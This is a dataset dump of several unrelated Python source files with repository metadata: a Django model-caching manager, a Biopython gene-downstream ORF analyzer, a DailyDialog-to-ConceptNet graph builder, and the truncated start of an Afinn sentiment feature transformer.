ncls.simple_queryset_cache_classes[\n key_fields_sorted] = queryset_cache_class\n\n if hasattr(ncls_instance, 'cached_foreignkeys'):\n cls.model_cached_foreignkeys[model] = ncls_instance.cached_foreignkeys\n\n return ncls\n\n @classmethod\n def create_cache_managers_from_models(cls):\n for model in get_models():\n if (not model in cls.model_cache_managers and\n hasattr(model, 'CacheMeta')):\n cache_manager_name = 'Auto%sCacheManager' % model.__name__\n type(cache_manager_name, (ModelCacheManager,), {\n 'model': model})\n\n\n @classmethod\n def patch_cached_foreignkeys(cls):\n for model, cached_foreignkeys in cls.model_cached_foreignkeys.items():\n for key in cached_foreignkeys:\n try:\n rel_model = model._meta.get_field(key).rel.to\n rel_model_pk_name = rel_model._meta.pk.name\n cache_class = rel_model.cache.get_cache_class_for(\n rel_model_pk_name)\n patch_related_object_descriptor(\n model, key, cache_class)\n except CacheNotRegistered:\n assert False, (\"Cached foreignkey can't be made on field \"+\n \"`%s` of %s. Because %s is not cached on \"+\n \"it's primary key\") % (\n key, model, model._meta.get_field(key).rel.to)\n\n\n @classmethod\n def get_model_cache_manager(cls, model):\n \"\"\" Returns the cache manager assosiated with given model\n \"\"\"\n if model not in cls.model_cache_managers:\n # If some model cache manager class is not defined for given\n # model then create it dynamically\n class_name = 'Auto%sCacheManager' % model.__name__\n type(class_name, (ModelCacheManager,), {\n 'model': model})\n return cls.model_cache_managers[model]\n\n\nclass CacheNotRegistered(Exception):\n def __init__(self, model, key_fields):\n msg = ('No cache registered for model `%s` on fields '+\n '`%s`') % (str(model), str(tuple(key_fields)))\n super(CacheNotRegistered, self).__init__(msg)\n\n\nclass ModelCacheManager(six.with_metaclass(ModelCacheManagerMeta,\n CacheManager)):\n version = 0\n timeout = flash_settings.DEFAULT_TIMEOUT\n\n @abstractproperty\n def model(self):\n pass\n\n def register_instance_classes(self):\n \"\"\" Create InstanceCache classes dynamically\n for each pair in get_key_fields_list.\n \"\"\"\n for key_fields in self.get_key_fields_list:\n class_name = '%sCacheOn' % self.model.__name__\n for field_name in key_fields:\n class_name += field_name.title()\n type(class_name, (InstanceCache,), {\n 'model': self.model,\n 'key_fields': key_fields,\n 'version': self.version,\n 'timeout': self.timeout,\n })\n\n def register_queryset_classes(self):\n \"\"\" Create QuerysetCache classes dynamically\n for each pair in filter_key_fields_list.\n \"\"\"\n for key_fields in self.filter_key_fields_list:\n class_name = '%sCacheOn' % self.model.__name__\n for field_name in key_fields:\n class_name += field_name.title()\n type(class_name, (QuerysetCache,), {\n 'model': self.model,\n 'key_fields': key_fields,\n 'version': self.version,\n 'timeout': self.timeout,\n })\n\n def get_key_fields(self, args_or_kwargs):\n key_fields = []\n\n is_dict = False\n if isinstance(args_or_kwargs, dict):\n args_set = set(args_or_kwargs.keys())\n is_dict = True\n kwargs = args_or_kwargs\n else:\n args_set = set(args_or_kwargs)\n\n if 'pk' in args_set:\n args_set.remove('pk')\n if is_dict:\n value = kwargs.pop('pk')\n pk_field_name = self.model._meta.pk.name\n args_set.add(pk_field_name)\n if is_dict:\n kwargs[pk_field_name] = value\n\n for key in args_set:\n if key == USING_KWARG:\n continue\n try:\n field = self.model._meta.get_field(key)\n key_fields.append(field.name)\n except:\n if hasattr(self.model, key):\n field = getattr(self.model, key)\n GenericForeignKey = importGenericForeignKey()\n if isinstance(field, GenericForeignKey):\n key_fields.append(key)\n continue\n if key.endswith('_id'):\n key_fields.append(key[:-3])\n continue\n raise\n return tuple(sorted(key_fields))\n\n def get(self, **kwargs):\n \"\"\" Find the instance_cache_class for given params\n and return it's get result.\n \"\"\"\n key_fields = self.get_key_fields(kwargs)\n if key_fields in self.simple_instance_cache_classes:\n instance_cache_class = self.simple_instance_cache_classes[key_fields]\n return instance_cache_class.get(**kwargs)\n raise CacheNotRegistered(self.model, key_fields)\n\n def get_query(self, **kwargs):\n \"\"\" Find the instance_cache_class for given params\n and return it's object for given params.\n \"\"\"\n key_fields = self.get_key_fields(kwargs)\n if key_fields in self.simple_instance_cache_classes:\n instance_cache_class = self.simple_instance_cache_classes[key_fields]\n return instance_cache_class(**kwargs)\n raise CacheNotRegistered(self.model, key_fields)\n\n def get_async(self, **kwargs):\n \"\"\" await counterpart of get method\n \"\"\"\n return self.get_query(**kwargs).resolve_async()\n\n def get_async_or_none(self, **kwargs):\n from .loader import object_or_none\n return object_or_none(self.get_async(**kwargs))\n\n def get_async_or_404(self, **kwargs):\n from .loader import object_or_404\n return object_or_404(self.get_async(**kwargs))\n\n def get_cache_class_for(self, *args):\n \"\"\" Find the instance_cache_class for given params\n and return it's cache class.\n \"\"\"\n key_fields = self.get_key_fields(args)\n if key_fields in self.simple_instance_cache_classes:\n instance_cache_class = self.simple_instance_cache_classes[key_fields]\n return instance_cache_class\n raise CacheNotRegistered(self.model, args)\n\n def get_key(self, **kwargs):\n \"\"\" Find the instance_cache_class for given params\n and return it's get_key result.\n \"\"\"\n key_fields = self.get_key_fields(kwargs)\n if key_fields in self.simple_instance_cache_classes:\n instance_cache_class = self.simple_instance_cache_classes[key_fields]\n return instance_cache_class.get_key(**kwargs)\n raise CacheNotRegistered(self.model, key_fields)\n\n def filter(self, **kwargs):\n \"\"\" Find the queryset_cache_class for given params\n and return it's get result.\n \"\"\"\n key_fields = self.get_key_fields(kwargs)\n if key_fields in self.simple_queryset_cache_classes:\n queryset_cache_class = self.simple_queryset_cache_classes[key_fields]\n return queryset_cache_class.get(**kwargs)\n raise CacheNotRegistered(self.model, key_fields)\n\n def filter_query(self, **kwargs):\n \"\"\" Find the queryset_cache_class for given params\n and return it's object for given params.\n \"\"\"\n key_fields = self.get_key_fields(kwargs)\n if key_fields in self.simple_queryset_cache_classes:\n queryset_cache_class = self.simple_queryset_cache_classes[key_fields]\n return queryset_cache_class(**kwargs)\n raise CacheNotRegistered(self.model, key_fields)\n\n def filter_async(self, **kwargs):\n \"\"\" await counterpart of filter method.\n \"\"\"\n return self.filter_query(**kwargs).resolve_async()\n\n def filter_cache_class_for(self, *args):\n \"\"\" Find the queryset_cache_class for given params\n and return it's cache class.\n \"\"\"\n key_fields = self.get_key_fields(args)\n if key_fields in self.simple_queryset_cache_classes:\n queryset_cache_class = self.simple_queryset_cache_classes[key_fields]\n return queryset_cache_class\n raise CacheNotRegistered(self.model, args)\n\n def get_or_404(self, **kwargs):\n \"\"\" If the get result is not found raises 404.\n \"\"\"\n try:\n return self.get(**kwargs)\n except self.model.DoesNotExist:\n raise Http404('No %s matches the given query.' %\n self.model._meta.object_name)\n\n def get_or_none(self, **kwargs):\n \"\"\" If the get result is not found returns None.\n \"\"\"\n try:\n return self.get(**kwargs)\n except self.model.DoesNotExist:\n return None\n", "repo_name": "HackerEarth/django-flash", "sub_path": "flash/base.py", "file_name": "base.py", "file_ext": "py", "file_size_in_byte": 58925, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "53", "api": [{"api_name": "django.core.cache.caches", "line_number": 17, "usage_type": "name"}, {"api_name": "django.db.models.get_models", "line_number": 26, "usage_type": "name"}, {"api_name": "django.apps.apps.get_models", "line_number": 26, "usage_type": "attribute"}, {"api_name": "django.apps.apps", "line_number": 26, "usage_type": "name"}, {"api_name": "django.contrib.contenttypes.generic.GenericForeignKey", "line_number": 41, "usage_type": "name"}, {"api_name": "django.contrib.contenttypes.fields.GenericForeignKey", "line_number": 44, "usage_type": "name"}, {"api_name": "django.contrib.contenttypes.fields.GenericForeignKey", "line_number": 45, "usage_type": "name"}, {"api_name": "django.core.cache.get_cache", "line_number": 53, "usage_type": "call"}, {"api_name": "flash.settings.CACHE_NAME", "line_number": 53, "usage_type": "attribute"}, {"api_name": "flash.settings", "line_number": 53, "usage_type": "name"}, {"api_name": "functools.partial", "line_number": 78, "usage_type": "call"}, {"api_name": "six.python_2_unicode_compatible", "line_number": 87, "usage_type": "attribute"}, {"api_name": "six.with_metaclass", "line_number": 128, "usage_type": "call"}, {"api_name": "abc.ABCMeta", "line_number": 128, "usage_type": "argument"}, {"api_name": "flash.settings.DEFAULT_TIMEOUT", "line_number": 144, "usage_type": "attribute"}, {"api_name": "flash.settings", "line_number": 144, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 162, "usage_type": "name"}, {"api_name": "flash.models.CacheDynamicVersion.objects.get_version_of", "line_number": 171, "usage_type": "call"}, {"api_name": "flash.models.CacheDynamicVersion.objects", "line_number": 171, "usage_type": "attribute"}, {"api_name": "flash.models.CacheDynamicVersion", "line_number": 171, "usage_type": "name"}, {"api_name": "flash.settings.WRITE_LOCK_TIMEOUT", "line_number": 194, "usage_type": "attribute"}, {"api_name": "flash.settings", "line_number": 194, "usage_type": "name"}, {"api_name": "flash.option.Some", "line_number": 237, "usage_type": "call"}, {"api_name": "abc.abstractmethod", "line_number": 239, "usage_type": "name"}, {"api_name": "time.time", "line_number": 269, "usage_type": "call"}, {"api_name": "time.time", "line_number": 323, "usage_type": "call"}, {"api_name": "time.time", "line_number": 365, "usage_type": "call"}, {"api_name": "distutils.version.StrictVersion", "line_number": 371, "usage_type": "call"}, {"api_name": "django.get_version", "line_number": 371, "usage_type": "call"}, {"api_name": "django.db.transaction.commit_unless_managed", "line_number": 372, "usage_type": "call"}, {"api_name": "django.db.transaction", "line_number": 372, "usage_type": "name"}, {"api_name": "flash.settings.DONT_USE_CACHE", "line_number": 402, "usage_type": "attribute"}, {"api_name": "flash.settings", "line_number": 402, "usage_type": "name"}, {"api_name": "flash.settings.DONT_USE_CACHE", "line_number": 415, "usage_type": "attribute"}, {"api_name": "flash.settings", "line_number": 415, "usage_type": "name"}, {"api_name": "flash.settings.DONT_USE_CACHE", "line_number": 426, "usage_type": "attribute"}, {"api_name": "flash.settings", "line_number": 426, "usage_type": "name"}, {"api_name": "thread_context.dataloader_context.DataLoadersFactory.get_loader_for", "line_number": 437, "usage_type": "call"}, {"api_name": "thread_context.dataloader_context.DataLoadersFactory", "line_number": 437, "usage_type": "name"}, {"api_name": "loader.FlashCacheLoader", "line_number": 437, "usage_type": "name"}, {"api_name": "loader.load", "line_number": 438, "usage_type": "call"}, {"api_name": "abc.ABCMeta", "line_number": 501, "usage_type": "name"}, {"api_name": "collections.defaultdict", "line_number": 507, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 508, "usage_type": "call"}, {"api_name": "six.with_metaclass", "line_number": 533, "usage_type": "call"}, {"api_name": "abc.abstractproperty", "line_number": 546, "usage_type": "name"}, {"api_name": "abc.abstractproperty", "line_number": 553, "usage_type": "name"}, {"api_name": "flash.settings.db_discoverer_func", "line_number": 558, "usage_type": "call"}, {"api_name": "flash.settings", "line_number": 558, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 573, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 577, "usage_type": "name"}, {"api_name": "django.contrib.contenttypes.fields.GenericForeignKey", "line_number": 621, "usage_type": "name"}, {"api_name": "django.contrib.contenttypes.fields.GenericForeignKey", "line_number": 622, "usage_type": "argument"}, {"api_name": "django.contrib.contenttypes.models.ContentType.objects_cache.get_for_model", "line_number": 628, "usage_type": "call"}, {"api_name": "django.contrib.contenttypes.models.ContentType.objects_cache", "line_number": 628, "usage_type": "attribute"}, {"api_name": "django.contrib.contenttypes.models.ContentType", "line_number": 628, "usage_type": "name"}, {"api_name": "django.db.models.Model", "line_number": 640, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 640, "usage_type": "name"}, {"api_name": "flash.utils.memcache_key_escape", "line_number": 656, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 663, "usage_type": "call"}, {"api_name": "six.get_unbound_function", "line_number": 673, "usage_type": "call"}, {"api_name": "six.get_unbound_function", "line_number": 674, "usage_type": "call"}, {"api_name": "django.contrib.contenttypes.fields.GenericForeignKey", "line_number": 756, "usage_type": "name"}, {"api_name": "django.contrib.contenttypes.fields.GenericForeignKey", "line_number": 757, "usage_type": "argument"}, {"api_name": "six.with_metaclass", "line_number": 781, "usage_type": "call"}, {"api_name": "abc.abstractproperty", "line_number": 795, "usage_type": "name"}, {"api_name": "flash.utils.flash_properties", "line_number": 866, "usage_type": "name"}, {"api_name": "copy.copy", "line_number": 883, "usage_type": "call"}, {"api_name": "six.with_metaclass", "line_number": 1057, "usage_type": "call"}, {"api_name": "abc.abstractproperty", "line_number": 1073, "usage_type": "name"}, {"api_name": "collections.defaultdict", "line_number": 1101, "usage_type": "call"}, {"api_name": "six.get_unbound_function", "line_number": 1109, "usage_type": "call"}, {"api_name": "six.get_unbound_function", "line_number": 1110, "usage_type": "call"}, {"api_name": "six.with_metaclass", "line_number": 1117, "usage_type": "call"}, {"api_name": "abc.abstractproperty", "line_number": 1132, "usage_type": "name"}, {"api_name": "six.with_metaclass", "line_number": 1188, "usage_type": "call"}, {"api_name": "abc.abstractproperty", "line_number": 1208, "usage_type": "name"}, {"api_name": "abc.abstractproperty", "line_number": 1231, "usage_type": "name"}, {"api_name": "six.with_metaclass", "line_number": 1247, "usage_type": "call"}, {"api_name": "abc.ABCMeta", "line_number": 1247, "usage_type": "argument"}, {"api_name": "django.db.models.fields.related_descriptors.ForwardManyToOneDescriptor", "line_number": 1253, "usage_type": "name"}, {"api_name": "abc.ABCMeta", "line_number": 1282, "usage_type": "name"}, {"api_name": "collections.defaultdict", "line_number": 1286, "usage_type": "call"}, {"api_name": "django.db.models.get_models", "line_number": 1375, "usage_type": "call"}, {"api_name": "six.with_metaclass", "line_number": 1421, "usage_type": "call"}, {"api_name": "flash.settings.DEFAULT_TIMEOUT", "line_number": 1424, "usage_type": "attribute"}, {"api_name": "flash.settings", "line_number": 1424, "usage_type": "name"}, {"api_name": "abc.abstractproperty", "line_number": 1426, "usage_type": "name"}, {"api_name": "django.contrib.contenttypes.fields.GenericForeignKey", "line_number": 1489, "usage_type": "name"}, {"api_name": "django.contrib.contenttypes.fields.GenericForeignKey", "line_number": 1490, "usage_type": "argument"}, {"api_name": "loader.object_or_none", "line_number": 1526, "usage_type": "call"}, {"api_name": "loader.object_or_404", "line_number": 1530, "usage_type": "call"}, {"api_name": "django.http.Http404", "line_number": 1593, "usage_type": "call"}]} +{"seq_id": "6290291944", "text": "from Bio.Alphabet import DNAAlphabet\nfrom Bio.Data.CodonTable import CodonTable, TranslationError, ambiguous_dna_by_id\nfrom Bio.Seq import Seq\nfrom Bio.SeqFeature import SeqFeature, ExactPosition\nfrom Bio.SeqRecord import SeqRecord\n\nfrom src.Base import Base\n\n__author__ = \"ronmor\"\n\n\ndef _cleave_after_stop_codon(nucleotide_seq, table):\n \"\"\"\n :param nucleotide_seq: The DNA sequence to cleave\n :type nucleotide_seq: Seq\n :param table:\n :type table: CodonTable\n :return:\n :rtype: list[Seq]\n :raises: ValueError if not a nucleotide sequence\n \"\"\"\n _check_if_nucleotide_sequence(nucleotide_seq)\n nucleotide_seq = nucleotide_seq.upper()\n stop_codons = table.stop_codons\n cleaved_at_stop = []\n codon = \"\"\n after_stop_index = 0\n for index, letter in enumerate(nucleotide_seq):\n codon += letter\n if codon in stop_codons:\n cleaved_at_stop.append(nucleotide_seq[after_stop_index:index + 1])\n after_stop_index = index + 1\n if len(codon) == 3:\n codon = \"\"\n return cleaved_at_stop\n\n\ndef _check_if_nucleotide_sequence(nucleotide_sequence):\n if not isinstance(nucleotide_sequence, Seq):\n raise ValueError(\"Expected a sequence, got %s instead\" % type(nucleotide_sequence))\n elif not isinstance(nucleotide_sequence.alphabet, DNAAlphabet):\n raise ValueError(\"Expected DNA alphabet, found %s instead\" % type(nucleotide_sequence.alphabet))\n\n\nclass DownstreamAnalyzer(object):\n def __init__(self, downstream_sequence, coding_sequence_start_index, genbank_file, is_complementary=False):\n \"\"\"\n :param downstream_sequence: The sequence downstream of the a gene which we want to analyze.\n :type downstream_sequence: Seq\n :param coding_sequence_start_index: The start index of the gene in the genbank-file features list.\n :type coding_sequence_start_index: int\n :param genbank_file:\n :type genbank_file: SeqRecord\n :param is_complementary:\n :type is_complementary: bool\n :raise: ValueError if the object doesn't hold a genbank documentation or if the genbank file isn't DNA\n \"\"\"\n self.__downstream_seq = downstream_sequence\n self.__start_index = coding_sequence_start_index\n self. __is_complementing = is_complementary\n if genbank_file is not None:\n if not isinstance(genbank_file, SeqRecord):\n raise ValueError(\n \"genbank file type expected to be of type SeqRecord, found %s instead\" % type(self.__genbank_file))\n _check_if_nucleotide_sequence(genbank_file.seq)\n self.__genbank_file = genbank_file\n\n @property\n def downstream_seq(self):\n return self.__downstream_seq\n\n @property\n def is_complementing(self):\n return self.__is_complementing\n\n def find_possible_proteins_in_downstream_sequence(self, table_id=11):\n \"\"\"\n For the downstream sequence, get all possible CDSs and return their matching proteins.\n ORF is searched for the entire sequence and not for the complement strand (3 total).\n Use only for sequences known not to have introns!\n :param table_id: ID of translation table as appears on https://www.ncbi.nlm.nih.gov/Taxonomy/Utils/wprintgc.cgi\n Defaults to 11.\n :type table_id: int\n :return: ORF index (0-2) to list of proteins (type Seq)\n :rtype: dict[int, list[Seq]]\n \"\"\"\n table = ambiguous_dna_by_id[table_id]\n orfs = self._find_possible_orfs_on_positive_strand(self.__downstream_seq)\n possible_proteins = {}\n for orf_num, orf in enumerate(orfs):\n cleaved_frame = _cleave_after_stop_codon(orf, table)\n for possible_cds in cleaved_frame:\n try:\n possible_protein = possible_cds.translate(table=table, cds=True)\n except TranslationError:\n continue\n else:\n possible_proteins[orf_num] = possible_protein\n return possible_proteins\n\n @staticmethod\n def _find_possible_orfs_on_positive_strand(nucleotide_sequence):\n \"\"\"\n Only find the orfs in the downstream sequence given, WITHOUT the complementing strand.\n :param nucleotide_sequence: the sequence to find the\n :rtype: [Seq]\n :return:\n \"\"\"\n for frame in range(3):\n length = 3 * ((len(nucleotide_sequence) - frame) // 3) # Multiple of three\n yield nucleotide_sequence[frame:frame + length]\n\n def _find_next_gene_index_in_genbank(self):\n \"\"\"\n :return:\n :rtype: int\n \"\"\"\n feature = None\n for feature in self.__genbank_file.features:\n if feature.location.start >= self.__start_index:\n break\n index = self.__genbank_file.features.index(feature) - 1 if feature else None\n if self.__is_complementing:\n return index\n elif index is not None:\n try:\n while self.__start_index < self.__genbank_file.features[index].location.start:\n index += 1\n # End of list\n except IndexError:\n index -= 1\n return index\n\n def generate_downstream_cdss(self):\n \"\"\"\n find all the features (usually CDSs) downstream of the gene, going towards the 3' end in both strands.\n :return:\n \"\"\"\n next_feature_index = self._find_next_gene_index_in_genbank()\n if next_feature_index is None:\n raise ValueError(\"Could not find a feature downstream\")\n downstream_feature_index = next_feature_index\n while abs(self.__genbank_file.features[downstream_feature_index].location.start -\n self.__genbank_file.features[next_feature_index].location.start) <= len(self.__downstream_seq):\n if not (self.__genbank_file.features[downstream_feature_index].strand == Base.COMPLEMENT\n and not self.__is_complementing):\n feature_to_yield = self.__genbank_file.features[downstream_feature_index]\n if hasattr(feature_to_yield, 'type') and feature_to_yield.type == 'CDS' and \\\n isinstance(feature_to_yield.location.start, ExactPosition) and \\\n isinstance(feature_to_yield.location.end, ExactPosition):\n yield feature_to_yield\n if self.__is_complementing:\n downstream_feature_index -= 1\n else:\n downstream_feature_index += 1\n if downstream_feature_index < 0 or downstream_feature_index > len(self.__genbank_file.features)-1:\n break\n\n def translate_feature(self, feature, table=11):\n \"\"\"\n :param feature: a feature of a genome. has to be RNA or DNA\n :type feature: SeqFeature\n :param table: The table used for translation: https://www.ncbi.nlm.nih.gov/Taxonomy/Utils/wprintgc.cgi\n :type table: int\n :rtype: Seq\n \"\"\"\n is_cds = True if feature.type == 'CDS' else False\n return feature.extract(self.__genbank_file).seq.translate(table=table, cds=is_cds)\n\n def __eq__(self, other):\n if not isinstance(other, type(self)):\n raise ValueError(\"Expected instance of %s got %s instead\" % (type(self), type(other)))\n return self.__downstream_seq == other.downstream_seq\n", "repo_name": "ronmoran/weizmann-aimr", "sub_path": "src/DownstreamAnalyzer.py", "file_name": "DownstreamAnalyzer.py", "file_ext": "py", "file_size_in_byte": 7434, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "Bio.Seq.Seq", "line_number": 39, "usage_type": "argument"}, {"api_name": "Bio.Alphabet.DNAAlphabet", "line_number": 41, "usage_type": "argument"}, {"api_name": "Bio.SeqRecord.SeqRecord", "line_number": 62, "usage_type": "argument"}, {"api_name": "Bio.Data.CodonTable.ambiguous_dna_by_id", "line_number": 87, "usage_type": "name"}, {"api_name": "Bio.Data.CodonTable.TranslationError", "line_number": 95, "usage_type": "name"}, {"api_name": "src.Base.Base.COMPLEMENT", "line_number": 145, "usage_type": "attribute"}, {"api_name": "src.Base.Base", "line_number": 145, "usage_type": "name"}, {"api_name": "Bio.SeqFeature.ExactPosition", "line_number": 149, "usage_type": "argument"}, {"api_name": "Bio.SeqFeature.ExactPosition", "line_number": 150, "usage_type": "argument"}]} +{"seq_id": "8258637633", "text": "import torch\nimport numpy as np\nimport os\nimport pickle\n\nfrom tqdm import tqdm\nfrom datasets import load_dataset\nfrom sentence_transformers import SentenceTransformer\n\nfrom message_enritcher.trie_structure import Trie\nfrom message_enritcher.knowledge_extractor import KnowledgeExtractor\n\nclass GraphBuilder:\n def __init__(self,\n path='/data/conceptNet_embs',\n save_path='datasets/',\n emb_file_name='conceptnet_embs',\n data_file_name='dialogs_data'):\n self.path = path\n self.save_path = save_path\n self.data_file_name = data_file_name\n self.emb_file_name = emb_file_name\n self.embeddings = None\n self.trie = None\n self.dataset = None\n self.conceptNet = None\n self.start_index = None\n self.set_dataset()\n self.set_embeddings()\n self.set_trie()\n self.set_start_index()\n self.preprocess_dialog_data()\n\n def set_dataset(self):\n print(\"load and save dataset\")\n dataset = load_dataset(\"daily_dialog\")\n self.train_dataset = dataset['train']['dialog']\n self.test_dataset = dataset['test']['dialog']\n self.val_dataset = dataset['validation']['dialog']\n conceptNet = load_dataset(\"peandrew/conceptnet_en_nomalized\")\n self.conceptNet = conceptNet['train']\n\n def preprocess_dialog_data(self):\n for i, conv in enumerate(self.train_dataset):\n for j, msg in enumerate(conv):\n self.train_dataset[i][j] = msg.strip()\n self.train_dataset = [data[:10] for data in self.train_dataset if len(data) > 4]\n\n for i, conv in enumerate(self.test_dataset):\n for j, msg in enumerate(conv):\n self.test_dataset[i][j] = msg.strip()\n self.test_dataset = [data[:10] for data in self.test_dataset if len(data) > 4]\n\n for i, conv in enumerate(self.val_dataset):\n for j, msg in enumerate(conv):\n self.val_dataset[i][j] = msg.strip()\n self.val_dataset = [data[:10] for data in self.val_dataset if len(data) > 4]\n\n def set_embeddings(self):\n print(\"load and save embeddings\")\n self.embeddings = self.get_embeddings()\n\n def set_trie(self):\n print(\"build trie datastructure\")\n self.trie = Trie()\n self.trie.insert_dataset(self.conceptNet, self.get_embeddings())\n del self.conceptNet\n del self.embeddings\n\n def get_embeddings(self, numpy_array=True):\n try:\n embeddings = self.load_tensor(file_name=self.emb_file_name, path=self.path)\n except:\n print(\"no saved embeddings could be found\")\n dataset = load_dataset(\"peandrew/conceptnet_en_nomalized\")\n model = SentenceTransformer('all-MiniLM-L6-v2')\n embeddings = model.encode(dataset['train']['arg2'])\n self.save_tensor(embeddings, file_name=self.emb_file_name, path=self.path)\n if numpy_array:\n embeddings = embeddings.cpu().detach().numpy()\n return embeddings\n\n def load_tensor(self, file_name, path):\n f = os.path.join(path, f\"{file_name}.pt\")\n return torch.load(f)\n\n def save_tensor(self, tensor, file_name, path):\n if not torch.is_tensor(tensor):\n tensor = torch.from_numpy(tensor)\n f = os.path.join(path, f\"{file_name}.pt\")\n torch.save(tensor, f)\n\n def set_start_index(self):\n print(\"load index\")\n file_list = os.listdir(self.path)\n max_end = 0\n try:\n for file_name in file_list:\n if self.data_file_name in file_name:\n f = file_name.split('_')[-1]\n start, end = f.split('-')\n end = int(end[:-2])\n max_end = max(end, max_end)\n except:\n print(f\"could not find a file that contains this {self.data_file_name} string\")\n self.start_index = max_end\n\n def from_dialog_to_graph(self,\n start_index,\n n_hops=4,\n save_data=False,\n save_steps=100,\n coll_nodes_hop=100,\n num_persons=2):\n\n save_folder_name = f'dd_hop{n_hops}_k{coll_nodes_hop}/'\n\n all_person_list = ['Max', 'Eva', 'Mareike', 'Sebastian', 'Holga']\n dialogs = []\n new_data = True\n datasets = [0, 1, 2]\n\n for data_idx in datasets:\n if data_idx == 0:\n dataset = self.test_dataset\n folder_name = \"test/data/raw/\"\n data_filename = 'test_data'\n elif data_idx == 1:\n dataset = self.val_dataset\n folder_name = \"val/data/raw/\"\n data_filename = 'val_data'\n else:\n dataset = self.train_dataset\n folder_name = \"train/data/raw/\"\n data_filename = 'train_data'\n\n end_index = len(dataset)\n start = start_index\n\n for index, conv in tqdm(enumerate(dataset[start_index:end_index], start=start_index),\n total=end_index - start_index):\n new_data = True\n person_list = np.char.array([all_person_list[person % num_persons] for person in range(len(conv))])\n person_msg_relations = np.char.array(['speak by' for _ in range(len(conv))])\n person_msg_edges = np.char.array([person_list, conv, person_msg_relations]).T\n\n message_subgrphs = []\n for i, msg in enumerate(conv):\n message_edges = {}\n msg_sub = KnowledgeExtractor(msg, self.trie, i % num_persons)\n for hop in range(n_hops):\n ex_nodes = msg_sub.new_hop(k=coll_nodes_hop)\n if ex_nodes == 0:\n break\n\n message_edges['person_msg'] = person_msg_edges[i]\n message_edges['msg_knowledge'] = msg_sub.data['msg_knowledge_edges']\n message_edges['knowledge_knowledge'] = msg_sub.graph_edges\n\n message_subgrphs.append(message_edges)\n\n dialogs.append(message_subgrphs)\n if save_data:\n if len(dialogs) >= save_steps:\n pickle.dump(dialogs, open(\n f\"{self.save_path + save_folder_name + folder_name}{data_filename}_{start}-{index}.p\",\n \"wb\"))\n start = index + 1\n del dialogs\n dialogs = []\n new_data = False\n if save_data and new_data:\n pickle.dump(dialogs,\n open(f\"{self.save_path + save_folder_name + folder_name}{data_filename}_{start}-{index}.p\",\n \"wb\"))\n del dialogs\n dialogs = []\n new_data = False\n print(\n f\"save file: \\t {data_filename}_{start}-{index}.p to: \\t {self.save_path + save_folder_name + folder_name}{data_filename}_{start}-{index}.p\")", "repo_name": "ShiraTUB/ActiveDoc", "sub_path": "DiaTransNet/data/graph_builder.py", "file_name": "graph_builder.py", "file_ext": "py", "file_size_in_byte": 7270, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "datasets.load_dataset", "line_number": 36, "usage_type": "call"}, {"api_name": "datasets.load_dataset", "line_number": 40, "usage_type": "call"}, {"api_name": "message_enritcher.trie_structure.Trie", "line_number": 65, "usage_type": "call"}, {"api_name": "datasets.load_dataset", "line_number": 75, "usage_type": "call"}, {"api_name": "sentence_transformers.SentenceTransformer", "line_number": 76, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 84, "usage_type": "call"}, {"api_name": "os.path", "line_number": 84, "usage_type": "attribute"}, {"api_name": "torch.load", "line_number": 85, "usage_type": "call"}, {"api_name": "torch.is_tensor", "line_number": 88, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 89, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 90, "usage_type": "call"}, {"api_name": "os.path", "line_number": 90, "usage_type": "attribute"}, {"api_name": "torch.save", "line_number": 91, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 95, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 140, "usage_type": "call"}, {"api_name": "numpy.char.array", "line_number": 143, "usage_type": "call"}, {"api_name": "numpy.char", "line_number": 143, "usage_type": "attribute"}, {"api_name": "numpy.char.array", "line_number": 144, "usage_type": "call"}, {"api_name": "numpy.char", "line_number": 144, "usage_type": "attribute"}, {"api_name": "numpy.char.array", "line_number": 145, "usage_type": "call"}, {"api_name": "numpy.char", "line_number": 145, "usage_type": "attribute"}, {"api_name": "message_enritcher.knowledge_extractor.KnowledgeExtractor", "line_number": 150, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 165, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 173, "usage_type": "call"}]} +{"seq_id": "3665822992", "text": "from sklearn.base import TransformerMixin, BaseEstimator\nfrom sklearn.preprocessing import MinMaxScaler\nfrom nltk.tokenize import word_tokenize\nfrom utils.Parameters import Parameters\nimport numpy as np\nfrom pymongo import MongoClient\nparameters = Parameters()\nfrom afinn import Afinn\n\n\nafinn = Afinn()\n\n\"\"\"\nconfigs:\n0- No feature\n1- sentence polarity TODO:(needs parameterization )\n2- num_polarity_words / num_neutral_words\n3- mean_pos mean_neg\n4- median_pos median_neg\n\"\"\"\n\n\nclass AfinnTransformer(TransformerMixin, BaseEstimator):\n features = {'afinn_value': 0, 'polar_neutral_ratio': 0 }\n\n def __init__(self, featureSetConfiguration = 1 ):\n self.featureSetConfiguration = featureSetConfiguration\n\n def transform(self, X, **transform_params):\n\n mongoClient = MongoClient('localhost', 27017)\n ffCorpus = mongoClient.FACTFEELCorpus\n temp = [\n [0 for f in sorted(AfinnTransformer.features.keys())]\n for s in X\n ]\n # document_score\n if self.featureSetConfiguration == 1:\n documentCollection = ffCorpus.documents\n temp = []\n for document in X:\n features_to_set = AfinnTransformer.features\n # current learning instance info from database\n currentDocument= documentCollection.find_one({'document_id': document })\n raw_documet = currentDocument['raw'].lower()\n b = afinn.score(raw_documet)\n features_to_set['afinn_value'] = b\n\n temp.append([features_to_set[key] for key in sorted(features_to_set.keys())])\n min_max_scaler = MinMaxScaler()\n temp = min_max_scaler.fit_transform(temp)\n # num_polarity_words / num_neutral_words\n elif self.featureSetConfiguration == 2:\n documentCollection = ffCorpus.documents\n temp = []\n for document in X:\n features_to_set = AfinnTransformer.features\n # current learning instance info from database\n currentDocument = 